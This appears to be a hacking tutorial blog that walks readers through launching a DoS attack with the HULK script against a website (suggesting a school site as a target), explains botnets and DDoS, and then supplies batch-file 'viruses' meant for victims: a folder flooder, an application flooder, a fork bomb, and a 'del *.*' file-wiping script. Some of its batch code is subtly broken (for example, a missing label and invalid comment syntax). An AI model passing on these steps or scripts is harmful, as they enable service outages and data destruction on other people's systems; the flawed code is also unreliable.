how to Launching dos attack

Legal? Illegal? I hate these blurred lines.

dos attack

Most servers are built to handle a fairly large bandwidth and even the
smaller ones can give maximum speeds to several hundreds of clients.
Keeping this in mind, it is very difficult and for the most part impossible
to actually bring down a website using DOS from a single computer. Where
your internet speed might be 1Mbps, your target server might have several
100Mbps. This is the reason that most DOS attacks are actually DDOS,that is
Distributed-Denial of Service.

DDOS attacks can easily bring down majority of websites. In DDOS, Botnets
are used which are just a bunch of compromised systems who have been
infected with a virus or trojan. A simple trojan can be sent out as a
public download, and if the unsuspecting victims download it the trojan may
silently settle down somewhere deep in the system and start up in the
background without the user or the system ever knowing. When enough systems
have been compromised in this way the master of the Botnet, the hacker who
wants to DDOS a website may send out a message to the dormant trojans on
several systems around the world, which may then indivisually begin
attacking a server. This can be very harmful to the website, which due to
lack of resources, may shut down for a long time and even get corrupted due
to overloading. Further, since the requests for transactions are coming
from seemingly random IP addresses all at once(the botnet), the victim may
never find out the identity of the mastermind.

Although I won’t get into the technical details, here is an example of a
fairly popular DOS tool – HULK. Hulk is just a simple python script that
continuously sends out large packets from randomly generated IDs so as to
fool the server. Again, using it from just one computer may not actually do
anything to any big websites, but it may be able to bring down a small
website, for example your school’s website in about a minute.





To perform this attack you need two things:

1. The python Engine (v2.x) – To run and compile the hulk script. You can
get it here :
http://www.python.org/getit/
NOTE : Download the 2nd version only (for example the current one is
2.7.6), this script does not work with the 3.x version of python.

2. Hulk.py script – This will run like a normal cmd.exe window. It’s a
small zip file,Get it here :
http://packetstormsecurity.com/files/download/112856/hulk.zip

For technical details, The official website is :

http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/

When all is done, you should have python installed, and hulk.py file
extracted. It would be easier if you installed Python to a root directory,
for example :
C:\\PYTHON27.
Also, put the hulk.py file which you just extracted in the same root
directory alongside the PYTHON27 folder(In my case, I put the hulk.py file
in the C:\ directory).Again, both python folder and the hulk.py file are
now in the C:\ ). With all that done, let’s launch our DOS attack !

1. Open Run, type cmd to start cmd.exe window.

2. Change directory to where you installed PYTHON and put hulk.py , Type
‘cd’ then the directory (Case sensitive) (cd= change directory)
cd C:\\PYTHON27

3. Now start up the hulk.py script as follows :
C:\\hulk.py http://www.google.com

(Write the directory of the hulk.py file followed by a space followed by
the website you want to attack (Don’t actually try this with google, since
they tend to block IPs with weird requests like the ones we are sending.
You may be blocked from google for some time. If you want to try it out,
consider setting up a small website on your own, or ask someone’s
permission.)

You should now see something like:

HULK ATTACK STARTED

Give it a few seconds then it will show how many requests it has sent. A few more seconds and if the attack was succesfull you will see something like: ‘Response Code 500′

As soon as you spot this, try opening the website which may say : ‘Resource Limit Reached’ or ‘Service Unavailable’ meaning you have successfully brought down the website.

Technically, most servers may temporarily deny all requests from your ISP (internet service provider) and hence your IP address meaning that you’ve not actually brought down the website for the world but only for yourself(The website banned you). This is why DOS isn’t as effective as DDOS. When the server has to repeatedly deny several IP addresses, it truly runs out of resources for anyone wanting to open the website.

ddos attack

what is ddos?

Child's play ends here.

what is dos

A distributed denial of service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.

In a typical DDoS attack, the assailant begins by exploiting a vulnerability in one computer system and making it the DDoS master. The attack master, also known as the botmaster, identifies and identifies and infects other vulnerable systems with malware. Eventually, the assailant instructs the controlled machines to launch an attack against a specified target.

There are two types of DDoS attacks: a network-centric attack which overloads a service by using up bandwidth and an application-layer attack which overloads a service or database with application calls. The inundation of packets to the target causes a denial of service. While the media tends to focus on the target of a DDoS attack as the victim, in reality there are many victims in a DDoS attack , the final target and as well the systems controlled by the intruder. Although the owners of co-opted computers are typically unaware that their computers have been compromised, they are nevertheless likely to suffer a degradation of service and not work well.

A computer under the control of an intruder is known as a zombie or bot. A group of co-opted computers is known as a botnet or a zombie army. Both Kaspersky Labs and Symantec have identified botnets – not spam, viruses, or worms – as the biggest threat to Internet security.

going beyond

How much is too much?

 

viruses

What we covered in the previous few tutorials barely even scratched the surface of batch file viruses. As more and more viruses are developed, the antivirus softwares are keeping up with an equal pace to stop them. Batch file viruses represent the very beginning of any kind of viruses. Today, however, almost every single suspicious batch file is an easy target for any antivirus. Most antivirus will not let you execute them, even if they do, the batch file will be quickly shut down from execution as the antivirus realises it is malicious. Further, batch file viruses are the first ones to show up on any virus scan.

So, why bother? what’s the point of learning how to make batch file viruses? Their practical potential is next to nothing, they are easy to find, easy to delete and spreading them is out of the question.

It’s a start.

That is pretty much the only reason that batch file viruses are important. They are taught all over the world in various hacking courses for good reason. Every hacking forum, every comment section below a hacking video or a blog is filled with people looking for a way into the vast hacking universe. This is it. The more “out of the box” a virus or a malicious tool is, the harder it is to pin down and identify. But to get to the more complex stuff, one needs to master the basics first. Even though something like the innocent little batch file viruses don’t have that “oomph”, they pave the way for greater things. You probably can’t take out every computer on the internet with batch files, but you will be able format an unprotected computer, you will be able to shutdown a computer every time on startup etc. This may not be enough “reward” for most people to put in the effort, but without a foundation you can’t hope to soar high. Rome wasn’t built in a day and so is the case with anyone’s hacking skills. Everyone has to start somewhere and there’s no better place than batch file programming.

As an added bonus, batch file programming is ridiculously easy. Barring the likes of HTML and SQL you will never see another sentence with “programming” and “ridiculously easy” in it. (For more on this, see “Programming -I, II” in the intermediate category).

Learning how to make batch files gives you a glimpse of the much more complex world of advanced programming as well as how basic viruses are made and how they work. Lastly, no security system is completely foolproof

Folder Blaster

Doing the old stuff in new ways.

Folder Blaster

Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).
Start “Run”, or hit [Windows key + R]. Type “cmd”, and you’re presented with the CLI. You can type “help” to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) – meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later).

You will soon be learning how to hack into a remote computer and get the CMD window of the victim’s computer. Hence, I recommend getting used to the CLI, as soon as possible, as much as possible. Before getting to the code, let’s take a look at a couple of commands.

md – (or mkdir) – Make Directory. This command is used to create a directory (a folder). The command:
md abcd
..will create a folder in the current directory named “abcd”.

cd – Change Directory. This command is used to change the current directory. The following command:
cd C:\\
..will take the program (your batch file) to the Root folder and:
cd C:\\Users
..will take you to the folder called Users in the C drive. You can change where you “mkdir” by using “cd”. (You can now create folders in any directory you like)

Here we’ve got the Folder Blaster virus. Again, this one’s fairly easy to understand. What we’re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
:confirm
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto confirm

So, we begin by turning off echo. Then we change the directory to Desktop. Now we create ten folders with names 0-9. We setup a label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.The above code can be made much shorter with the use of LOOPs, as discussed below. We start by creating a variable and setting it’s value to 0. We use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:

@echo off
set /a i=0
:loop
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop
:end

“set” is used to define and initialize a variable. Here we create a variable called “i” and set it’s value to zero. After setting up a label, we check if the value of the variable “i” (given by %i%) is equal to 10, and if it is we “goto” the label end (the program ends when this happens). Now we “echo” (send a message) to notify the user which iteration is currently running. In the next step we increment the value of “i” by one and then go back to the “if” statement.

So the loop runs ten times (0-9), and then stops. The above was not a virus, but a simple program. Earlier, I told you that the above Folder Blaster virus code can be made shorter by using loops. You know how to make the virus, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker. (HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop.)

Application Flooder

Application Flooder Overwhelm your victim

 

the hacker

The “Application flooder” although technically harmless, is a really annoying virus. Now that we’re moving further along in making batch file viruses, let’s stop for a second to discuss a couple of basic commands:

@echo off – This command stops the batch file from showing the commands as they are being carried out, that is the command window will not show the commands as they are being performed. However, the output or error of the commands on execution will still be printed out in the command prompt window which is exactly like the cmd.exe window. We use this command when we don’t want to notify the user that something is going on, to hide unnecessary background details so that the user can’t actually see what’s causing trouble – which is what we’re doing here. Note that the command window will still show up, but there are methods to get around even this (to which we’ll get to later on).

// – The ‘//’ (- two slashes) is used in A LOT of places to insert comments. A comment is just some text (or string), usually inserted to give the program’s reader some help in understanding the code. Whenever any compiler or say the command line interpreter bumps into // – It ignores everything that comes after it, in that line. It just skips it over, pretends there’s nothing there, and moves on to the next line. In many programming languages too, like C, C++, Java etc. you will find comments exactly like these everywhere.

Getting to the interesting bit, below we have the code for the application flooder virus. As always you can type it in a notepad and save as a .bat file (any name). Try to understand what’s going on below and then head over to the explanation.

@echo off
 //label
start winword //MS word
start mspaint //paint
start notepad
start write //wordpad
start cmd //cmd prompt
start explorer
start control //panel
start calc //calculator
goto x //infinite loop

Explanation: So, we start off by turning off “echo”. Now, the user won’t know which file is running and what’s causing havoc on their innocent computer. We set a label, say x. Now “start” is used to, well, start applications. We can start these application by using the names of their executable files (the ones that runs these applications). So, the user will see – Paint, Calculator, Control Panel, NotePad, WordPad etc. – All of them opening up for seemingly no reason. Check out the last line, “goto x”, remember that label we set up top named ‘x’? The goto statement send the program back to the beginning causing an infinite loop (that will probably run several times a second). So, the victim’s computer will be drowned in a sea of random applications coming out of nowhere, and opening up faster than he can close them. It will eat up all the RAM, making the computer lag and possibly restart or making the user push the power button. Nevertheless kids, don’t try this at home.

Even though today our systems can handle a lot of stuff all at once, there’s still some minor risk in this batch file causing the windows to crash, maybe leave permanent damage too.

Fork Bomb

Fork Bomb The virus everyone knows.

Fork Bomb

Another classic, A fork bomb is the equivalent of a DOS attack on your own system. It aims at depriving the system off it’s Random access memory, leaving none for vital functions required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not Deadly to a computer, Just annoying.

As with the previous batch file virus tutorials, all you need to do is open up notepad, type and save the following code as a batch file, that is with extension .bat

%0|%0

(That was it.)
Technically, the above 5 characters are short for the following more comprehensible code :

:s
start %0
goto s

Here, the first line creates a sort of checkpoint called ‘s’. It can be used to bring the programs pointer to a specific command, as is done here by using ‘goto’ in the last statement. ‘%0′ is actually the name of the .bat file itself. So every time the loop is run another instance of the same program is called and then both of them run together, to again duplicate themselves.
If that seems too simple to cause any trouble, read on.

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs are created. After another cycle, each of those two create another two for a total of four same programs. After 10 iterations we have 2^10 = 1024 programs. After 100 iterations we have 2^100 = 1.267 nonillion, a number so big you don’t even know what ‘nonillion’ is (It’s 10^30).

Even with today’s CPUs and RAMs being in the Giga Range(Ghz and Gb), the first program will probably not even complete 50 iterations before running out of memory. Mind you, every iteration would hardly take a few milliseconds , so running this file will almost definitely crash your computer.

Wiping Out Memory

Wiping Out Memory Nothing will be spared.

hacker

In the previous tutorial, we overloaded the computer’s memory, now we’re going to wipe it all off.  This is a short and easy one.

Step 1: Open up Notepad.

Step 2: Type : del *.*

Step 3: Save it as a .bat file(For eg. Any_name.bat)

That’s it! In this command, “del” is for deleting and the following text specifies the file to be deleted(Along with Directory).
Putting a ‘*’ before the ‘.’ means that no matter what the file’s name is, it will be deleted. Putting a ‘*’ after the ‘.’ means that no matter what the file’s type is, it will be deleted. Combined, it means that whatever file is encountered by the .Bat it will be wiped off completely. In quite a lot of programming languages, a “*” signifies “all” or “everything”.

Again, this is quite dangerous to a system without antivirus as nothing will be left when this guy is done. Although technically, the system will crash as soon as the .bat file encounters some vital file required for the computer to work hence crashing it.
On an average system this should take less than a minute to do it’s thing after which Windows will be corrupted and the only way to use the computer, would be to install the operating system again

this post about types of hacking blackhat white hat hacker what is hacking
online mobile computer hacked games mobile hacker hack facebook